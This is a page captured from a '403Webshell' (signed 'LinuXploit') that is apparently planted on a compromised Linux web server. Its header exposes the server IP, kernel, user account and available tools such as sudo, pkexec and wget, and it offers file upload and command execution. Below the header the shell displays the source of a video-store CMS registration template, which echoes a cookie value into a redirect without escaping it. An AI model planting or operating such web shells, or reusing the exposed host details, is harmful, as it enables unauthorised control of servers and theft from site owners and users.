403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/classicscash.com/public_html/cms_admin/phptemplate/voderic/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/classicscash.com/public_html/cms_admin/phptemplate/voderic/register.tpl
<?php /*

PLEASE BACK UP FILE BEFORE EDITING!!!

TEXT EDITING NOTE:
All text can be edited inside the admin panel to preserve  multi-language site functionality. All tags prefixed with "$templatefields" can be edited inside the CMS admin panel.

*/

$title = $templatefields["titletxtregister"];
$seokey  = ($event) ? $event["SEOkey"] : "";
$seodesc = ($event) ? $event["SEOdesc"] : "";

// Header
LoadTemplate("header.tpl", ["pagename" => "register", "title" => $title, "seokey" => $seokey, "seodesc" => $seodesc]);
?>
	<div class="secure">
		<div class="joinWrap"><p><i></i><span>REGISTER NOW! ALL TRANSACTIONS ARE 100% SECURE AND CONFIDENTIAL</span><i></i></p></div>
	</div>

	<section id="register" class="centeredWrapper"><p align=center>Welcome! Register allows you to place orders and buy one clip or many. Only pay for what you want, No Monthly fees! 
<br /><b>Buy</b> - allows you to download the video or stream it online
<br /><b>Rent</b> - allows you to only stream the video, good for 7 days
<br />Photo sets come with downloadable ZIPs. Where applicable, Photo sets are included when you Buy a video
<br /><br />
</p>

<?php if (!empty($_GET["ty"])) { ?>

			<div class="formStatus centerBox bgBox"><?php echo $templatefields["txtcheckemail"]; ?></div>

<?php } elseif (!empty($_GET["confirm"])) { ?>

			<div class="formStatus centerBox bgBox">
	<?php if ($errmsg) { ?>
		<span style="color:red;"><?php echo $templatefields["txterror"]; ?> </span>: <?= $errmsg ?>
	<?php } else { ?>
		<?php echo $templatefields["txtemailconfirmed"]; ?> 

		<?php if (!empty($_COOKIE["elxprotect_goback"])) { ?>
			<?php echo $templatefields["txtredirected"]; ?>
			<meta http-equiv="refresh" content="5; url=<?= $_COOKIE["elxprotect_goback"] ?>" />
		<?php } else { ?>
			<a href="odlogin.php"><?php echo $templatefields["txtlogin"]; ?></a>
		<?php } ?>
	<?php } ?>
			</div>

<?php } else { ?>

<script>

$(function() {
	$( "#slider-range-max" ).slider({
	  min: 6,
	  max: 20,
	  value: 12,
	  slide: function( event, ui ) {
	    $( "#amount" ).val( ui.value );
	    
	    changepass(ui.value);
	    
	  }
	});
	$( "#amount" ).val( $( "#slider-range-max" ).slider( "value" ) );
});

function showpass()
{
	document.forms.frm.Pass1.setAttribute('type', 'text');  
	document.forms.frm.Pass2.setAttribute('type', 'text');
	
	$("#sp").hide();
	$("#hp").show();
}

function hidepass()
{
	document.forms.frm.Pass1.setAttribute('type', 'password');  
	document.forms.frm.Pass2.setAttribute('type', 'password');
	
	$("#hp").hide();
	$("#sp").show();
}

function generatepass()
{
	var popup_width = Math.min(Math.max($(window).width() - 20, 320), 500);


	changepass( $( "#amount" ).val() );

    $( "#genpass").dialog({
	     position: { my: "center center", at: "center center", of: $(window) },
	     title: "Generate Password",
	     width:popup_width,
	     modal: true,
         open: function(event, ui) { document.forms.logpop.Login.focus();  $('.ui-widget-overlay').bind('click', function(){ $("#genpass").dialog('close');}); }
    });
}

function setpass()
{
	document.forms.frm.Pass1.value = $("#generated_pass").html();
	document.forms.frm.Pass2.value = $("#generated_pass").html();

	$('#genpass').dialog('close');
	showpass();
}

function changepass(size)
{
	
    var generated = "";
    var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

    for( var i=0; i < size; i++ )
        generated += possible.charAt(Math.floor(Math.random() * possible.length));
	

	
	$("#generated_pass").html(generated);
}

</script>
<style>
#generated_pass
{
	font: 24px arial;
	text-align:center;
}

</style>
		<div class="container containerSm">

			<div id="genpass" style="display:none;">
				<p>
				  <label for="amount">Password Length:</label>
				  <input type="text" id="amount" readonly value="12">
				</p>
				<div id="slider-range-max"></div>
				<div class="txt">Here is your generated password. Please write this down.</div>
				<div id="generated_pass"></div>
				
				<input type="button" value="Set Password" onclick="setpass()" />
				<input type="button" value="Cancel" onclick="$('#genpass').dialog('close');" />
			</div>

			<form name="frm" method="POST" class="forms">
				<h3><?php echo $templatefields["titletxtregister"]; ?><?php echo $templatefields["txtregister"]; ?></h3>
				<input name="Login" class="textbox" placeholder="USERNAME" type="text" value="<?= htmlentities($login) ?>">
				<input name="Email" class="textbox" placeholder="EMAIL" type="email" value="<?= htmlentities($email) ?>">
				<input name="Pass1" class="textbox" placeholder="<?php echo strtoupper($templatefields["txtpassword"]); ?>" type="password" value="<?= htmlentities($pass1) ?>">
				<input name="generate" class="textbox btn textboxBtn" type="button" value="GENERATE PASSWORD" onclick="generatepass()" />
				<input name="Pass2" class="textbox" type="password" placeholder="<?php echo strtoupper($templatefields["txtconfirmpassword"]); ?>" value="<?= htmlentities($pass2) ?>" />
				<input id="sp" class="textbox btn textboxBtn" type="button" value="SHOW PASSWORDS" onclick="showpass()" />
				<input id="hp" class="textbox btn textboxBtn" style="display:none;" type="button" value="HIDE PASSWORDS" onclick="hidepass()" />
<?php if ($area["Captchas"] & 2) { ?>
				<input name="captcha" class="textbox" placeholder="CAPTCHA" autocomplete="off" maxlength="5" style="text-transform:uppercase;" />
				<figure class="captchaWrapper"><img id="odcaptcha2" src="odlogin.php?captcha=<?php echo rand() ?>" /></figure>
				<input type="button" class="textbox btn textboxBtn" value="REFRESH IMAGE" onclick="refreshcaptcha('odcaptcha2')" />		
<?php } ?>
				<button class="btn btnSubmit" type="submit" name="Submit"><?php echo $templatefields["txtsubmit"]; ?></button>
				<div class="alreadyMember"><a href="odlogin.php"><?php echo $templatefields["txtalreadyamember"]; ?></a></div>
			</form>




<?php } ?>

		</div>
		<!-- /.container -->

	</section>

<!--Footer-->
<?php include "footer.tpl"; ?>

Youez - 2016 - github.com/yon3zu
LinuXploit